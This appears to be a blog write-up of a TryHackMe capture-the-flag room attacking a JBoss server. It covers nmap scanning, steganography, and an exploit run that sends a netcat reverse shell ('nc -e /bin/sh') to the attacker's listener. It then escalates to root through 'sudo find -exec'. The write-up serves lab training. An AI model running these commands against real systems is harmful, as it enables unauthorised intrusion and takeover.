Tony the Tiger — TryHackMe — WriteUp

TonyRahmos
4 min readNov 12, 2020

--

Hello. I’m Rahmos. Here is my Tony the Tiger — TryHackMe — WriteUp. Check it out!

I’m going right into task 3. Cause you can answer all the questions of task 2 by reading.

TASK 3

First, deploy the machine and scan for opened ports using nmap.

nmap -A -T4 -v -p- <ip>

nmap -A -sV -p8080 <ip> to scan for service running on port 8080

nmap
port 8080

So copy the “VERSION’’ and it’s your first ans. And for the 2nd question, it’s “JBOSS”.

TASK 4

First, let’s access the website at port 80. It’s where Tony talking about “cereal”.

Website port 80

Look closely at his first post:

First post

Photos that have a deeper meaning means Steganography! Download his avatar and find hidden data.

Here is the link of his avatar: https://i.imgur.com/ATbbYpN.jpg

I’m gonna use wget to get this image.

Get his avt

I’ve used strings to find out what is hidden, but it seems I’m inspecting the wrong image.

Get back to the web and click on his other post: Frosted Flakes. You will see another image. Again, download this image and find hidden data.

Here is the link: https://i.imgur.com/be2sOV9.jpg

Frosted Flakes

strings be2sOV9.jpg

strings

Here you’ll get the 1st flag.

TASK 5

Because the web app is vulnerable to code execution, so we will spawn a reverse shell.

First, start a listener on your machine:

nc -lvnp 4444

Download the exploit code from THM, and exec like this command:

python3 exploit.py <ip>:8080 “nc -e /bin/sh <your-vpn-ip> 4444”

exec code

When it’s successful, you will have the shell.

shell

In order to get a stable shell, and also can su to another user, spawn a tty shell using python:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

tty shell

TASK 6

The question is JBOSS’s flag, so let’s cd to /home/jboss to look around

There is a “note” file inside jboss’s home folder. Read its content.

content of note

Now we know Jboss’s password. Let’s su to him

su jboss

List content and cat jboss’s flag

list content
jboss’s flag

TASK 7

Now I’ll find a way to get root!

First, sudo -l to see if jboss can run command as root:

sudo -l

So, jboss can run “find” as root without password needed.

find can execute another command with flag -exec, so let’s spawn a root shell using this command:

sudo find . -exec /bin/sh \; -quit

*Remember the \; at the end, because it indicates the end of the statement to execute.

Now I’m root! Get our final flag in /root/root.txt

root flag

It’s encoded with Base64 and hashed with MD5. So firtst, decode the string from base64, then crack with md5 hash.

decoded from Base64

Then copy the decoded string to https://crackstation.net/ to crack.

crackstation

The end.

HAPPY HACKING

--

--